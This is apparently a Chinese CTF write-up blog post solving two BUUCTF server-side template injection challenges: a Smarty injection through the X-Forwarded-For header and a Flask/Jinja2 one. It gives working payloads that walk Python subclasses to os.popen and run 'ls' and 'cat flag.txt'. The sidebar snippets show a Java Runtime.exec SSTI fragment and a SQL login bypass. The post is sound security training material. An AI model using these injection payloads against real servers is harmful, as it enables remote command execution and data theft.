BUUCTF刷题十一道(12)附-SSTI专题二

于 2024-04-09 17:22:40 发布
阅读量393 收藏 8
点赞数 5
分类专栏: Web 文章标签: web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45837896/article/details/137557971
版权

文章目录

学习文章

SSTI-服务端模板注入漏洞
flask之ssti模板注入从零到入门
CTFSHOW SSTI篇-yu22x
SSTI模板注入绕过(进阶篇)-yu22x
SSTI模板注入学习-竹言笙熙

全部总结看最后一篇

[CISCN2019 华东南赛区]Web11【存疑】

Smarty 模板注入与沙箱逃逸-长亭科技

在这里插入图片描述
发现能显示ip地址,没有其他传参的地方,应该在xff头
自定义xff头,尝试模板注入

在这里插入图片描述
但是构造获取类会出错
在这里插入图片描述
又查了查,有特性

在这里插入图片描述


Smarty支持使用{php}{/php}标签来执行被包裹其中的php指令

Smarty 是一个用于 PHP 的模板引擎,它允许开发者将动态生成的内容与静态 HTML 分离,以提高代码的可维护性和可读性。在 Smarty 模板中,通常不直接执行 PHP 代码,而是使用 Smarty 提供的一些特定的语法和功能来代替。

Smarty 模板中执行 PHP 语句的一种常见方式是使用 {php} 标签。但是需要注意的是,从 Smarty3 开始,{php} 标签已经被废弃,并不建议使用,因为它会导致模板与业务逻辑的耦合度增加,降低模板的可维护性。


{php}
    // PHP 代码
    $name = 'John';
    echo "Hello, $name!";
{/php}

看了很多篇博客没说清楚为什么直接能{system('ls')}命令执行,所以请看文章开头长亭的smarty模板注入原理

漏洞产生语句类似


$smarty->display("string:". $name);

{$smarty.version}返回smarty版本

在这里插入图片描述
好吧我还是没看懂为什么{phpinfo()}能执行

在这里插入图片描述
在这里插入图片描述

[RootersCTF2019]I_❤️_Flask

页面卡,翻一下快一点

git clone https://github.com/s0md3v/Arjun

工具可扫到name参数

尝试name参数处ssti
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述


# 查看基类类
?name={{().__class__.__base__}}
# 查看子类
{{().__class__.__base__.__subclasses__()}}

# 寻找os

# 触发连招

{{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}

# 读取flag.txt
{{().__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat flag.txt').read()}}

在这里插入图片描述
在这里插入图片描述

Sprint#51264
关注
  • 5
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。...
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
031-关于Flask SSTI,解锁你不知的新姿势.pdf
09-20
031-关于Flask SSTI,解锁你不知的新姿势.pdf
SSTI
03-09
**SSTI(Server-Side Template Injection)**是一种严重的网络安全漏洞,主要出现在使用服务器端模板引擎的Web应用程序中。这种漏洞允许攻击者注入恶意代码到服务器端模板,从而执行任意服务器端代码,获取敏感信息...
BUUCTF刷题十一【缺】(10)
qq_45837896的博客
11-13 1552
文章目录EasyBypass[SCTF2019]Flag Shop[BSidesCF 2019]SVGMagic[极客大挑战 2020]Greatphp[GYCTF2020]Easyphp【留坑-反序列化】[HarekazeCTF2019]Avatar Uploader 1[FireshellCTF2020]Caas[ISITDTU 2019]EasyPHP[N1CTF 2018]eating_cms[GYCTF2020]Ez_Express【留坑-nodejs原型链污染】[强网杯 2019]Upload
BUUCTF刷题十一(06)
qq_45837896的博客
07-29 1417
BUUCTF刷题十一
BUUCTF解题十一(04)
qq_45837896的博客
06-14 1412
文章目录[GWCTF 2019]我有一个数据库[BJDCTF2020]ZJCTF,不过如此[BJDCTF2020]The mystery of ip[BJDCTF2020]Mark loves cat[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[ASIS 2019]Unicorn shop[BJDCTF2020]Cookie is so stable[BSidesCF 2020]Had a bad day[CISCN 2019 初赛]Love Math [GWCTF 2019
BUUCTF解题web十一
qq_45837896的博客
05-26 1298
[2019极客大挑战]EASYSQL 到页面里发现是一个登录框 回想注入思路,先判断注入类型,然后尝试登陆绕过 使用万能密码username=’ or 1=1 or ‘1’=‘1’# &password=asd [2019极客大挑战]HAVEFUN 打开页面发现是一只猫猫,点了两下拖了两下发现没什么 然后老规矩F12查看有没有提示信息 发现有这么一段代码,可以对页面传参cat,传cat='dog’就执行了一段代码,不知是什么,尝试了一下直接出了flag… [SUCTF]EASYSQL 进入发现是
BUUCTF刷题十一(05)
qq_45837896的博客
07-27 1095
BUUCTF刷题
CTF常见用法小总结
qq_45837896的博客
05-31 1039
CTF方法零碎小总结
BUUCTF解题web十一(02)
qq_45837896的博客
06-01 1009
[RoarCTF 2019]Easy Calc 进入页面,发现,诶还真是一个计算器 输几个数进去,还真能计算,不过2^10算的时候遭到了计算器的抵抗 哈哈哈哈步入正轨 看看源码是有个输入过滤,发现这个计算器在向calc.php传参,我们进去看看 这就是calc.php页面,在这里我们看到了GET传参,还有一个黑名单,这又是正则匹配绕过呀 ...
BUUCTF刷题十一(08)
qq_45837896的博客
09-08 986
思路是从已有的脚本资源中发现使用的框架,在了解了框架代码结构之后找到jwt认证,然后再伪造。不能命令执行,根据前辈博客,尝试包含临时文件,利用PHP7 Segment Fault。注册新用户登录,点击提交flag发现提示没有权限,转到f12source查看js脚本。发现里面没有路径提示,只有个check_open()函数,f12去js里面找一下。oh我就说,读/vaw/www/html目录下的,tmp目录下的不能用。传参/etc/passwd有回显,尝试data伪协议发现被禁,有过滤。
BUUCTF刷题十一(11)
qq_45837896的博客
03-27 735
打开BUU排行榜仰望各位大佬,想来我所谓的努力还是微不足
BUUCTF刷题十一12SSTI专题
最新发布
qq_45837896的博客
04-09 707
SSTI填坑
BUUCTF解题web十一(03)
qq_45837896的博客
06-09 570
[极客大挑战 2019]HardSQL 看这个标题着实心里一紧,完了,写不出来了? 又是同一系列,这次看看有什么新挑战 输入万能密码 出现这个,应该是敏感字符过滤,然后试了几次,发现+,=,and,<,>,空格,tab,换行都被过滤 测试闭合 单引号 是,有个闭合错误,但是这样不能用联合注入和堆叠注入,没有空格可以用,只能考虑报错注入 好家伙报错注入忘记很多,再看一遍 报错注入常见函数: updatexml(),extractvalue,floor() floor(rand(0
BUUCTF刷题十一(09)
qq_45837896的博客
09-26 437
蚁剑连接无法查看flag,发现是有disable_functions限制,使用蚁剑绕过disable_functions插件。session可控,修改session,长度为32位,session后缀改为.php(加上.php后为32位)这个可以开burp扫一下,或者用dirsearch扫一下,一些url会自动跳转index.php。变量,POST优先级高于$_GET,所以这里POST传GET相应变量没字母的。解析字符串时不会进行url解码,所以可以用url编码绕过,而。
攻防世界web warmup writeup
qq_45837896的博客
08-01 259
打开给的环境发现一个滑稽…于是查看源代码看看有什么提示 根据提示打开目标网页 发现源代码网页,其中还提示了一个叫做hint.php的页面,打开它发现是 它提示在这个文件里有flag,先保留这个信息继续代码审计 根据代码我们知 1.传入一个字符串file值 2.file值能通过checkFile函数的检验 3.不然就给一个大滑稽 再对checkFile函数进行查看 发现以下几点, 1.传入的file必须是字符串 2.传入的值必须在whitelist白名单中 3.然后用mb_substr函数对page进
ssti刷题fuzz
08-17
当涉及到SSTI漏洞的fuzzing时,你可以尝试以下步骤来发现潜在的漏洞点: 1. 了解目标应用程序:首先,你需要了解目标应用程序使用的模板引擎和其语法。不同的模板引擎可能有不同的漏洞点和语法特性。 2. 构建有效...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值